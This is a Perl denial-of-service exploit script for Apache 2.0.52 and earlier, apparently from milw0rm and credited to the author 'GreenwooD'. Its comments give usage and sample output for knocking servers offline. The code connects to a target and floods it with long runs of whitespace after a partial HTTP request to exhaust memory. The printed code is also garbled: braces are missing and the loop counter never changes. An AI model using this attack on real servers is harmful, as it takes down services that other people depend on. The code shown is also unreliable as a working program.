# Based on ->
# apache-squ1rt.c exploit.
# Original credit goes to Chintan Trivedi on the
# FullDisclosure mailing list:
# http://seclists.org/lists/fulldisclosure/2004/Nov/0022.html
# More info ->
# http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0942
# Added ->
# Added future with we can exploit Apache web servers on windows system. For it you should experiment
# with [trys] parameter of this code.
# By default parameter trys = 8000, for DoS Apache web servers on windows system try to
# increase this parameter.
# For example. In my system I have 256Mb of RAM. For DoS Apache web severs I run this exploit like this
# C:\perl ap2.0.52_dos.pl 30000
# <+> Prepare to start connect.
# <+> Connected to
# <+> Send of first part of devil header.
# <+> Prepare to DoS with 10000 trys.
# <+> Start DoS second part of devil header.
# <SOD> |====================> <EOD>
# <+> Ok now target web server maybe DoSeD.
# Note ->
# If progresbar not response server mybe already DoSeD. Try to open web page hosted on this web servers.
# And if you see "Eror 500" you are lucky man :)
# Warnings ->
# This is POC code you can use only on you own servers. Writer don't response if you damadge you servers or
# use it for attack, or others things.
# Shit ->
# My English now is bulls shit :( I try study it :)
# Tested under Window 2000 SP4 with Apache 2.0.49 (Win)
# Grests fly to Chintan Trivedi NsT, RST, Void, Unlock and other underground world.
# Contact to me at greenwood3[AT]yandex[dot]ru
use IO::Socket;
if (@ARGV <1)
print "\n ::: ---------------------------------------------- :::\n";
print " ::: Another yet DoS exploit for Apache <= 2.0.52 :::\n";
print " ::: Usage: ap2.0.52_dos.pl <ip> [trys] :::\n";
print " ::: Coded by GreenwooD from Network Security Team :::\n";
print " ::: ---------------------------------------------- :::\n";
print "\n <+> Prepare to start connect.\n";
$s = IO::Socket::INET->new(Proto=>"tcp",
) or die " <-> Target web server already DoSeD ??? or can't connect :(\n";
print " <+> Connected to $ARGV[0]\n";
print " <+> Send of first part of devil header.\n";
print $s "GET / HTTP/1.0\n";
$trys = 8000; # Default
if ($ARGV[1])
$trys = $ARGV[1];
print " <+> Prepare to DoS with $trys trys.\n";
print " <+> Start DoS send second part of devil header.\n";
print " <SOD> |";
do {
print $s (" " x 8000 . "\n");
if ($i % 500 == 0)
print "=";
} until ($i == $trys);
print "> <EOD>\n";
print " <+> Ok now target web server maybe DoSeD.\n";
# milw0rm.com [2005-03-04]